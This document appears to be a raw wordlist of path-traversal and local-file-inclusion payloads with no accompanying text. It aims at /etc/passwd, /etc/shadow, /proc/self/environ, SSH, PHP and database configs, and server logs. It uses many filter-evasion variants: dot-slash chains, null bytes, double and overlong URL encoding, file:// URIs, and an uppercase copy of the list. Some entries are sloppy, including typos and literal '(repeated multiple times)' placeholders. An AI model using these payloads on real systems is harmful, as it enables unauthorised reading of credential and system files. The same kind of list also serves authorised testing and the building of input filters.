html
home
index
page
incliude
web
configure
index.php%00
html.php%00
home.php%00
page.php%00
incliude.php%00
web.php&00
/etc/passwd
/var/log/auth
../etc/passwd
/home/user/etc/passwd
/root/etc/passwd
/var/www/html/etc/passwd
/usr/local/etc/passwd
/opt/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/resolv.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/nginx/nginx.conf
/etc/apache2/apache2.conf
/etc/php.ini
/etc/mysql/my.cnf
/etc/redis.conf
/etc/crontab
/etc/passwd.bak
/etc/shadow.bak
/etc/group.bak
/etc/hosts.bak
/etc/resolv.conf.bak
/etc/ssh/ssh_config.bak
/etc/ssh/sshd_config.bak
/etc/nginx/nginx.conf.bak
/etc/apache2/apache2.conf.bak
/etc/php.ini.bak
/etc/mysql/my.cnf.bak
/etc/redis.conf.bak
/etc/crontab.bak
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
....//....//....//....//var//log//auth
....//....//....//....//var//log//auth.log
....//....//....//....//....//etc//passwd
file:///../../../../../../etc/passwd
file:////../../../../../../etc/passwd
file:////../../../../../../../var/log/auth
file:///auth.log

file:///auth
file:///index
file:///index.php
file:///etc/passwd
file:///etc/hosts
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/etc/passwd
....\/....\/....\/etc/passwd
....\/....\/etc/passwd
....\/etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//etc/passwd
....//....//etc/passwd
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../../../../../../../var/log/apache2/access.log
..//..//..//..//..//..//..//var//log//apache2//access.log
file:////var/log/apache2/access.log
file:///proc/self/environ
../../../../../../../proc/self/environ
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
../etc/passwd
../../../../../../etc/passwd
../../../../../var/log/auth
../../../../../var/log/auth.log
....//....//etc//passwd
....//....//....//var//log//auth
....//....//....//var//log//auth.log
....//....//....//etc//passwd
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///index.php
file:////var/log/apache2/access.log
..//..//..//..//..//..//..//proc//self//environ
file:///proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%252e%252e%252fetc%252fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/shadow
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afshadow
%252e%252e%252fetc%252fshadow
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/hosts
%00../../../etc/passwd
%00../../../var/log/auth
../../../../../../../../../proc/self/environ
..//..//..//..//..//proc//self//environ
%00/etc/passwd
%00/var/log/auth.log
index.php%00
html.php%00
home.php%00
web.php%00
include.php%00
index%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fvar%252fpasswd
file://etc/passwd%00
file://../../../../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cvar%5clog%5cauth.log
../%00../etc/passwd
%00..%00..%00..%00etc%00passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
%252fetc%252fpasswd
%00../../../../../../etc/shadow
%00/var/log/auth
%00../../etc/passwd
file://localhost/etc/passwd
%00file:///etc/passwd
....//....//....//proc//self//environ
....//....//....//var//log//auth
%252e%252e%252fetc%252fpasswd
..//..//..//..//proc//self//environ
file:///../../../../../../../proc/self/environ
%00file:///var/log/auth.log
../../../../../../../../etc/passwd
../../../../../../../../var/log/auth
file:///var/log/auth.log
file:////proc/self/environ
%252e%252e%252f%252e%252e%252fpasswd
%252fvar%252flog%252fauth.log
%252fvar%252flog%252fapache2%252faccess.log
file://../../../../../../../var/log/apache2/access.log
%252fproc%252fself%252fenviron
%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
%252e%252e%252f%252e%252e%252fvar%252fpasswd
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afauth
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../../../../proc/self/environ
%00../../../../../proc/self/environ
%00../../../../../../../../../var/log/apache2/access.log
%00../../../var/log/apache2/access.log
%00../../../../etc/shadow
file:////../../../../../../../../etc/passwd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%252fproc%252fself%252fenviron
%252fvar%252flog%252fauth.log
%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron
%252fetc%252fshadow
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
....//....//proc//self//environ
file:///etc/hosts
....//....//etc//shadow
file:////../../../../../../../../../etc/shadow
%2e%2e/%2e%2e/%2e%2e/etc/hosts
%00../../../../etc/hosts
file:////etc/shadow
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fshadow
%c0%ae%c0%ae%c0%afproc%c0%afself%c0%afenviron
%00../../../proc/self/environ
file:////var/log/apache2/access.log
file:////proc/self/environ
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%afetc%c0%afpasswd
/%00../etc/passwd
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc%5cpasswd
%00../../../../../../../../../etc/shadow
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afshadow
%252e%252e%252f%252e%252e%252fpasswd
file:////../../../../../proc/self/environ
%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
%00../../../../../../../etc/shadow
%c0%ae%c0%ae%c0%afvar%c0%aflog%c0%afapache2
../../../../../../../../../../etc/hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252fproc%252fself%252fenviron
file://..%252fetc%252fpasswd
../../../../../proc/self/environ
file:////var/log/auth
../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/log/auth
../../../../../var/log/auth.log%00
../../../../../var/log/apache2/error.log
file://///proc/self/environ
file://../../../../../../../../../etc/hosts
../../../../../../../var/log/syslog
file://../../../../../proc/self/environ
file:///proc/sys/kernel/random/uuid
../../../../../../../var/run/utmp
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../var/spool/mail/root%00
../../../../../../../etc/passwd%00
../../../../../var/log/messages%00
../../../../../../../proc/kmsg
../../../../../../../var/log/dmesg
file://../../../../../../../var/log/lastlog
../../../../../var/log/wtmp%00
../../../../../../../../../var/lib/dpkg/status
../../../../../../../../../../etc/crontab%00
../../../../../../../../../usr/share/doc/apache2/changelog.Debian.gz
../../../../../var/log/tallylog%00
file:///var/spool/cron/crontabs/root
../../../../../proc/self/mountinfo
../../../../../../../../../../../../etc/sudoers%00
../../../../../../../../../etc/network/interfaces
../../../../../../../../../../../../etc/fstab%00
file://../../../../../etc/default/grub
../../../../../../../../../proc/cpuinfo
../../../../../../../../../../../../proc/cmdline%00
file:///proc/mounts%00
/index.php
/html.php
/home.php
/page.php
/include.php
/web.php
/etc/passwd
/var/log/auth
/var/log/auth.log
../etc/passwd
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../etc/hosts
../../../../../../../proc/self/environ
./etc/passwd
./var/log/auth
./var/log/auth.log
./etc/hosts
./proc/self/environ
./var/log/apache2/access.log
.././etc/passwd
.././var/log/auth
.././var/log/auth.log
.././etc/hosts
.././proc/self/environ
.././var/log/apache2/access.log
../../../../../../etc/passwd
../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth  
/configure
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fauth.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron
file:///etc/passwd
file:///var/log/auth
file:///var/log/auth.log
file:///etc/hosts
file:///proc/self/environ
file:///var/log/apache2/access.log
../../../../../../etc/passwd (repeated multiple times)
../../../../../../../../../var/log/auth (repeated multiple times)
../../../../../../../../../var/log/auth.log (repeated multiple times)
../../../../../../../../../var/log/apache2/access.log (repeated multiple times)
../../../../../../../../../etc/hosts (repeated multiple times)
../../../../../../../../../proc/self/environ (repeated multiple times)
.././etc/passwd
../../../../../../etc/passwd/../../../../../../etc/passwd
../../../../../../../../../var/log/auth/../../../../../../../../../var/log/auth
../../../../../../../../../var/log/auth.log/../../../../../../../../../var/log/auth.log
../../../../../../../../../var/log/apache2/access.log/../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../etc/hosts/../../../../../../../../../etc/hosts
../../../../../../../../../proc/self/environ/../../../../../../../../../proc/self/environ
%252e%252e%252f%252e%252e%252f%252e%252e%252fpasswd
../../../../../../../configure
../../../../../../../../../configure
%252fetc%252fconfigure
%00../../../../../../configure
%00/configure
%00../../configure
file://configure
%00file:///etc/passwd
....//....//....//....//....//configure
configure
INDEX
HTML
HOME
PAGE
INCLIUDE
WEB
CONFIGURE
INDEX.PHP%00
HTML.PHP%00
HOME.PHP%00
PAGE.PHP%00
INCLIUDE.PHP%00
WEB.PHP&00
/ETC/PASSWD
/VAR/LOG/AUTH
../ETC/PASSWD
/HOME/USER/ETC/PASSWD
/ROOT/ETC/PASSWD
/VAR/WWW/HTML/ETC/PASSWD
/USR/LOCAL/ETC/PASSWD
/OPT/ETC/PASSWD
/ETC/SHADOW
/ETC/GROUP
/ETC/HOSTS
/ETC/RESOLV.CONF
/ETC/SSH/SSH_CONFIG
/ETC/SSH/SSHD_CONFIG
/ETC/NGINX/NGINX.CONF
/ETC/APACHE2/APACHE2.CONF
/ETC/PHP.INI
/ETC/MYSQL/MY.CNF
/ETC/REDIS.CONF
/ETC/CRONTAB
/ETC/PASSWD.BAK
/ETC/SHADOW.BAK
/ETC/GROUP.BAK
/ETC/HOSTS.BAK
/ETC/RESOLV.CONF.BAK
/ETC/SSH/SSH_CONFIG.BAK
/ETC/SSH/SSHD_CONFIG.BAK
/ETC/NGINX/NGINX.CONF.BAK
/ETC/APACHE2/APACHE2.CONF.BAK
/ETC/PHP.INI.BAK
/ETC/MYSQL/MY.CNF.BAK
/ETC/REDIS.CONF.BAK
/ETC/CRONTAB.BAK
../../../../../../ETC/PASSWD
../../../../../../../../../VAR/LOG/AUTH
../../../../../../../../../VAR/LOG/AUTH.LOG
....//....//....//....//VAR//LOG//AUTH
....//....//....//....//VAR//LOG//AUTH.LOG
....//....//....//....//....//ETC//PASSWD
FILE:///../../../../../../ETC/PASSWD
FILE:////../../../../../../ETC/PASSWD
FILE:////../../../../../../../VAR/LOG/AUTH
FILE:///AUTH.LOG
FILE:///AUTH
FILE:///INDEX
FILE:///INDEX.PHP
FILE:///ETC/PASSWD
FILE:///ETC/HOSTS
../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
..//..//..//..//..//..//..//VAR//LOG//APACHE2//ACCESS.LOG
FILE:////VAR/LOG/APACHE2/ACCESS.LOG
FILE:///PROC/SELF/ENVIRON
../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
../ETC/PASSWD
../../../../../../ETC/PASSWD
../../../../../VAR/LOG/AUTH
../../../../../VAR/LOG/AUTH.LOG
....//....//ETC//PASSWD
....//....//....//VAR//LOG//AUTH
....//....//....//VAR//LOG//AUTH.LOG
....//....//....//ETC//PASSWD
FILE:///ETC/PASSWD
FILE:///VAR/LOG/AUTH
FILE:///VAR/LOG/AUTH.LOG
FILE:///INDEX.PHP
FILE:////VAR/LOG/APACHE2/ACCESS.LOG
..//..//..//..//..//..//..//PROC//SELF//ENVIRON
FILE:///PROC/SELF/ENVIRON
%2E%2E%2F%2E%2E%2F%2E%2E%2FETC%2FPASSWD
%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
%252E%252E%252FETC%252FPASSWD
%2E%2E/%2E%2E/%2E%2E/ETC/SHADOW
%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFETC%C0%AFPASSWD
%C0%AE%C0%AE%C0%AFETC%C0%AFSHADOW
%252E%252E%252FETC%252FSHADOW
%252E%252E%252F%252E%252E%252FETC%252FPASSWD
%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/ETC/PASSWD
../../../../../../../../../ETC/PASSWD%00
../../../../../../../../../ETC/HOSTS
%00../../../ETC/PASSWD
%00../../../VAR/LOG/AUTH
../../../../../../../../../PROC/SELF/ENVIRON
..//..//..//..//..//PROC//SELF//ENVIRON
%00/ETC/PASSWD
%00/VAR/LOG/AUTH.LOG
INDEX.PHP%00
HTML.PHP%00
HOME.PHP%00
WEB.PHP%00
INCLUDE.PHP%00
INDEX%00
%252E%252E%252F%252E%252E%252F%252E%252E%252FVAR%252FPASSWD
FILE://ETC/PASSWD%00
FILE://../../../../ETC/PASSWD
%2E%2E%5C%2E%2E%5C%2E%2E%5CETC%5CPASSWD
%5C%5C%2E%2E%5C%5C%2E%2E%5C%5C%2E%2E%5CPASSWD
%2E%2E%5C%2E%2E%5C%2E%2E%5CVAR%5CLOG%5CAUTH.LOG
../%00../ETC/PASSWD
%00..%00..%00..%00ETC%00PASSWD
%252E%252E%252F%252E%252E%252F%252E%252E%252FPASSWD
../../../../../../../VAR/LOG/AUTH
../../../../../../../../../VAR/LOG/AUTH.LOG
%252FETC%252FPASSWD
%00../../../../../../ETC/SHADOW
%00/VAR/LOG/AUTH
%00../../ETC/PASSWD
FILE://LOCALHOST/ETC/PASSWD
%00FILE:///ETC/PASSWD
....//....//....//PROC//SELF//ENVIRON
....//....//....//VAR//LOG//AUTH
%252E%252E%252FETC%252FPASSWD
..//..//..//..//PROC//SELF//ENVIRON
FILE:///../../../../../../../PROC/SELF/ENVIRON
%00FILE:///VAR/LOG/AUTH.LOG
../../../../../../../../ETC/PASSWD
../../../../../../../../VAR/LOG/AUTH
FILE:///VAR/LOG/AUTH.LOG
FILE:////PROC/SELF/ENVIRON
%252E%252E%252F%252E%252E%252FPASSWD
%252FVAR%252FLOG%252FAUTH.LOG
%252FVAR%252FLOG%252FAPACHE2%252FACCESS.LOG
FILE://../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
%252FPROC%252FSELF%252FENVIRON
%2E%2E%2F%2E%2E%2F%2E%2E%2FPROC%2FSELF%2FENVIRON
%252E%252E%252F%252E%252E%252FVAR%252FPASSWD
%C0%AE%C0%AE%C0%AFVAR%C0%AFLOG%C0%AFAUTH
%C0%AE%C0%AE%C0%AFPROC%C0%AFSELF%C0%AFENVIRON
%00../../../../../../PROC/SELF/ENVIRON
%00../../../../../PROC/SELF/ENVIRON
%00../../../../../../../../../VAR/LOG/APACHE2/ACCESS.LOG
%00../../../VAR/LOG/APACHE2/ACCESS.LOG
%00../../../../ETC/SHADOW
FILE:////../../../../../../../../ETC/PASSWD
%C0%AE%C0%AE%C0%AFETC%C0%AFPASSWD
%252FPROC%252FSELF%252FENVIRON
%252FVAR%252FLOG%252FAUTH.LOG
%252E%252E%252F%252E%252E%252FPROC%252FSELF%252FENVIRON
%252FETC%252FSHADOW
%2E%2E/%2E%2E/%2E%2E/%2E%2E/ETC/HOSTS
%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
FILE://%2E%2E/%2E%2E/%2E%2E/%2E%2E/ETC/PASSWD
../..%00/ETC/PASSWD
../..%00/VAR/LOG/AUTH.LOG
....//....//....//VAR//LOG//AUTH
....//....//....//VAR//LOG//AUTH.LOG
....//....//....//ETC//PASSWD
....//....//....//ETC//SHADOW
..%2F..%2F..%2F..%2FVAR%2FLOG%2FAUTH.LOG
..%2F..%2F..%2F..%2FVAR%2FLOG%2FAPACHE2%2FACCESS.LOG
.../..%00/VAR/LOG/AUTH
../../../../../../../etc/php/5.6/apache2/php.ini
../../../../../../../etc/php/5.6/cli/php.ini
../../../../../../../etc/php/7.0/apache2/php.ini
../../../../../../../etc/php/7.0/cli/php.ini
../../../../../../../etc/php/7.1/apache2/php.ini
../../../../../../../etc/php/7.1/cli/php.ini
../../../../../../../etc/php/7.2/apache2/php.ini
../../../../../../../etc/php/7.2/cli/php.ini
../../../../../../../etc/php/7.3/apache2/php.ini
../../../../../../../etc/php/7.3/cli/php.ini
../../../../../../../etc/php/7.4/apache2/php.ini
../../../../../../../etc/php/7.4/cli/php.ini
../../../../../../../etc/php/8.0/apache2/php.ini
../../../../../../../etc/php/8.0/cli/php.ini
../../../../../../../etc/php/8.1/apache2/php.ini
../../../../../../../etc/php/8.1/cli/php.ini
../../../../../../../etc/php/8.2/apache2/php.ini
../../../../../../../etc/php/8.2/cli/php.ini
....//....//etc//php//5.6//apache2//php.ini
....//....//etc//php//5.6//cli//php.ini
....//....//etc//php//7.0//apache2//php.ini
....//....//etc//php//7.0//cli//php.ini
....//....//etc//php//7.1//apache2//php.ini
....//....//etc//php//7.1//cli//php.ini
....//....//etc//php//7.2//apache2//php.ini
....//....//etc//php//7.2//cli//php.ini
....//....//etc//php//7.3//apache2//php.ini
....//....//etc//php//7.3//cli//php.ini
....//....//etc//php//7.4//apache2//php.ini
....//....//etc//php//7.4//cli//php.ini
....//....//etc//php//8.0//apache2//php.ini
....//....//etc//php//8.0//cli//php.ini
....//....//etc//php//8.1//apache2//php.ini
....//....//etc//php//8.1//cli//php.ini
....//....//etc//php//8.2//apache2//php.ini
....//....//etc//php//8.2//cli//php.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2fcli%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2fapache2%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2fcli%2fphp.ini
../../../../../../../../etc/php/5.6/fpm/php.ini
../../../../../../../../etc/php/7.0/fpm/php.ini
../../../../../../../../etc/php/7.1/fpm/php.ini
../../../../../../../../etc/php/7.2/fpm/php.ini
../../../../../../../../etc/php/7.3/fpm/php.ini
../../../../../../../../etc/php/7.4/fpm/php.ini
../../../../../../../../etc/php/8.0/fpm/php.ini
../../../../../../../../etc/php/8.1/fpm/php.ini
../../../../../../../../etc/php/8.2/fpm/php.ini
....//....//etc//php//5.6//fpm//php.ini
....//....//etc//php//7.0//fpm//php.ini
....//....//etc//php//7.1//fpm//php.ini
....//....//etc//php//7.2//fpm//php.ini
....//....//etc//php//7.3//fpm//php.ini
....//....//etc//php//7.4//fpm//php.ini
....//....//etc//php//8.0//fpm//php.ini
....//....//etc//php//8.1//fpm//php.ini
....//....//etc//php//8.2//fpm//php.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f5.6%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.0%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.1%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.2%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.3%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f7.4%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.0%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.1%2ffpm%2fphp.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fphp%2f8.2%2ffpm%2fphp.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fphp%252f5.6%252ffpm%252fphp.ini
